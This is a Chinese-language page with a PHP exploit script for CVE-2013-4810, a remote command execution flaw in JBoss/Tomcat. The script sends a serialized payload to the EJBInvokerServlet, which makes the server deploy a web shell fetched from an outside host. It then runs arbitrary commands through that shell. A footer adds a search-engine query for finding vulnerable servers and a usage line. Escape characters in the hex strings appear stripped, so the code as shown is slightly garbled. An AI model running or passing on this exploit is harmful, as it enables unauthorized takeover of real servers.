[CVE:2013-4810]Apache Tomcat/JBoss远程命令执行

  1 <?php
  2 
  3 $host=gethostbyname($argv[1]);
  4 $port=$argv[2];
  5 $cmd=$argv[3];
  6 
  7 
  8 //small jsp shell
  9 //change this if you want, url to the app to be deployed, keep it short
 10 $url="http://retrogod.altervista.org/a.war?"; 
 11 
 12 
 13 $url_len=pack("n",strlen($url));
 14 
 15 function hex_dump($data, $newline="
") { 
 16 static $from = '';   
 17 static $to = '';    
 18 static $width = 16; static $pad = '.';  
 19  if ($from==='')   {     
 20      for ($i=0; $i<=0xFF; $i++)  { 
 21          $from .= chr($i);       
 22          $to .= ($i >= 0x20 && $i <= 0x7E) ? chr($i) : $pad;   
 23      }   
 24  }    
 25 $hex = str_split(bin2hex($data), $width*2);   
 26 $chars = str_split(strtr($data, $from, $to), $width);    
 27 $offset = 0;   
 28 foreach ($hex as $i => $line)   {     
 29     echo sprintf('%6X',$offset).' : '.implode(' ', str_split($line,2)) . ' [' . $chars[$i] . ']' . $newline;    
 30    $offset += $width;   
 31   } 
 32 } 
 33 
 34 $frag_i=
 35 "xacxedx00x05x73x72x00x29x6fx72x67x2ex6ax62x6fx73". // ....sr.) org.jbos
 36 "x73x2ex69x6ex76x6fx63x61x74x69x6fx6ex2ex4dx61x72". // s.invoca tion.Mar
 37 "x73x68x61x6cx6cx65x64x49x6ex76x6fx63x61x74x69x6f". // shalledI nvocatio
 38 "x6exf6x06x95x27x41x3exa4xbex0cx00x00x78x70x70x77". // n...'A>. ....xppw
 39 "x08x78x94x98x47xc1xd0x53x87x73x72x00x11x6ax61x76". // .x..G..S .sr..jav
 40 "x61x2ex6cx61x6ex67x2ex49x6ex74x65x67x65x72x12xe2". // a.lang.I nteger..
 41 "xa0xa4xf7x81x87x38x02x00x01x49x00x05x76x61x6cx75". // .....8.. .I..valu
 42 "x65x78x72x00x10x6ax61x76x61x2ex6cx61x6ex67x2ex4e". // exr..jav a.lang.N
 43 "x75x6dx62x65x72x86xacx95x1dx0bx94xe0x8bx02x00x00". // umber... ........
 44 "x78x70x26x95xbex0ax73x72x00x24x6fx72x67x2ex6ax62". // xp&...sr .$org.jb
 45 "x6fx73x73x2ex69x6ex76x6fx63x61x74x69x6fx6ex2ex4d". // oss.invo cation.M
 46 "x61x72x73x68x61x6cx6cx65x64x56x61x6cx75x65xeaxcc". // arshalle dValue..
 47 "xe0xd1xf4x4axd0x99x0cx00x00x78x70x77";
 48 
 49 $frag_ii="x00";
 50 
 51 $frag_iii=
 52 "xacxedx00x05x75x72x00x13x5bx4cx6ax61x76x61x2e".     // .....ur. .[Ljava.
 53 "x6cx61x6ex67x2ex4fx62x6ax65x63x74x3bx90xcex58x9f". // lang.Obj ect;..X.
 54 "x10x73x29x6cx02x00x00x78x70x00x00x00x04x73x72x00". // .s)l...x p....sr.
 55 "x1bx6ax61x76x61x78x2ex6dx61x6ex61x67x65x6dx65x6e". // .javax.m anagemen
 56 "x74x2ex4fx62x6ax65x63x74x4ex61x6dx65x0fx03xa7x1b". // t.Object Name....
 57 "xebx6dx15xcfx03x00x00x78x70x74x00x21x6ax62x6fx73". // .m.....x pt.!jbos
 58 "x73x2ex73x79x73x74x65x6dx3ax73x65x72x76x69x63x65". // s.system :service
 59 "x3dx4dx61x69x6ex44x65x70x6cx6fx79x65x72x78x74x00". // =MainDep loyerxt.
 60 "x06x64x65x70x6cx6fx79x75x71x00x7ex00x00x00x00x00". // .deployu q.~.....
 61 "x01x74".
 62 $url_len.
 63 $url.
 64 "x75x72x00".
 65 "x13x5bx4cx6ax61x76x61x2ex6cx61".                         // ur..[ Ljava.la
 66 "x6ex67x2ex53x74x72x69x6ex67x3bxadxd2x56xe7xe9x1d". // ng.Strin g;..V...
 67 "x7bx47x02x00x00x78x70x00x00x00x01x74x00x10x6ax61". // {G...xp. ...t..ja
 68 "x76x61x2ex6cx61x6ex67x2ex53x74x72x69x6ex67";
 69 
 70 $frag_iv=
 71 "x0dxd3". 
 72 "xbexc9x78x77x04x00x00x00x01x73x72x00x22x6fx72x67". // ..xw.... .sr."org
 73 "x2ex6ax62x6fx73x73x2ex69x6ex76x6fx63x61x74x69x6f". // .jboss.i nvocatio
 74 "x6ex2ex49x6ex76x6fx63x61x74x69x6fx6ex4bx65x79xb8". // n.Invoca tionKey.
 75 "xfbx72x84xd7x93x85xf9x02x00x01x49x00x07x6fx72x64". // .r...... ..I..ord
 76 "x69x6ex61x6cx78x70x00x00x00x05x73x71x00x7ex00x05". // inalxp.. ..sq.~..
 77 "x77x0dx00x00x00x05xacxedx00x05x70xfbx57xa7xaax78". // w....... ..p.W..x
 78 "x77x04x00x00x00x03x73x71x00x7ex00x07x00x00x00x04". // w.....sq .~......
 79 "x73x72x00x23x6fx72x67x2ex6ax62x6fx73x73x2ex69x6e". // sr.#org. jboss.in
 80 "x76x6fx63x61x74x69x6fx6ex2ex49x6ex76x6fx63x61x74". // vocation .Invocat
 81 "x69x6fx6ex54x79x70x65x59xa7x3ax1cxa5x2bx7cxbfx02". // ionTypeY .:..+|..
 82 "x00x01x49x00x07x6fx72x64x69x6ex61x6cx78x70x00x00". // ..I..ord inalxp..
 83 "x00x01x73x71x00x7ex00x07x00x00x00x0ax70x74x00x0f". // ..sq.~.. ....pt..
 84 "x4ax4dx58x5fx4fx42x4ax45x43x54x5fx4ex41x4dx45x73". // JMX_OBJE CT_NAMEs
 85 "x72x00x1bx6ax61x76x61x78x2ex6dx61x6ex61x67x65x6d". // r..javax .managem
 86 "x65x6ex74x2ex4fx62x6ax65x63x74x4ex61x6dx65x0fx03". // ent.Obje ctName..
 87 "xa7x1bxebx6dx15xcfx03x00x00x78x70x74x00x21x6ax62". // ...m.... .xpt.!jb
 88 "x6fx73x73x2ex73x79x73x74x65x6dx3ax73x65x72x76x69". // oss.syst em:servi
 89 "x63x65x3dx4dx61x69x6ex44x65x70x6cx6fx79x65x72x78". // ce=MainD eployerx
 90 "x78";                                                             // x
 91 
 92 $data=$frag_i.pack("v",strlen($frag_iii)+8).$frag_ii.pack("n",strlen($frag_iii)).$frag_iii.$frag_iv;
 93 
 94 //$pk=""POST /invoker/JMXInvokerServlet/ HTTP/1.1
". //the same ...
 95 
 96 $pk="POST /invoker/EJBInvokerServlet/ HTTP/1.1
".
 97     "ContentType: application/x-java-serialized-object; class=org.jboss.invocation.MarshalledInvocation
".
 98     "Accept-Encoding: x-gzip,x-deflate,gzip,deflate
".
 99     "User-Agent: Java/1.6.0_21
".
100     "Host: ".$host.":".$port."
".
101     "Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
".
102     "Connection: keep-alive
".
103     "Content-type: application/x-www-form-urlencoded
".
104     "Content-Length: ".strlen($data)."

".
105     $data;
106 //echo hex_dump($pk)."
";
107 $fp=fsockopen($host,$port,$e,$err,3);
108 fputs($fp,$pk);
109 $out=fread($fp,8192);
110 fclose($fp);
111 //echo hex_dump($out)."
";
112 
113 sleep(5);
114 
115 $pk="GET /a/pwn.jsp?cmd=".urlencode($cmd)." HTTP/1.0
".
116     "Host: ".$host.":".$port."
".
117     "Connection: Close

";
118 
119 echo hex_dump($pk)."
";
120 $fp=fsockopen($host,$port,$e,$err,3);
121 fputs($fp,$pk);
122 $out="";
123 while (!feof($fp)) {
124 $out.=fread($fp,8192);
125 }
126 fclose($fp);
127 echo $out;
128 ?>

#####################################################
Google 关键字: inurl:status EJBInvokerServlet  
利用方法:C:PHP>php exp.php target_ip port cmd
#####################################################

参考：http://www.hack80.com/thread-21814-1-1.html
https://www.exploit-db.com/exploits/28713/